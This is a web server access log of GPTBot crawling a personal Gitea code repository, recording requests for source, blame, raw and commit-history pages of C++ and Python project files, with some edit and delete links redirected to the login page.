[Client 74.7.227.38] [Length 15309] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" -[17/Feb/2026:16:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10182] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12753] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:16:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12298] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16094] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:16:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13450] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12298] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:16:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12299] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 19978] [Gzip 15.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:16:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11204] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest" [Client 74.7.227.38] [Length 9793] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:16:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" -[17/Feb/2026:16:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11213] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 16999] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:16:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:16:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 23802] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:16:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11168] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11431] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10180] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:16:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:16:07:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:16:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 18033] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10082] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 5415] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 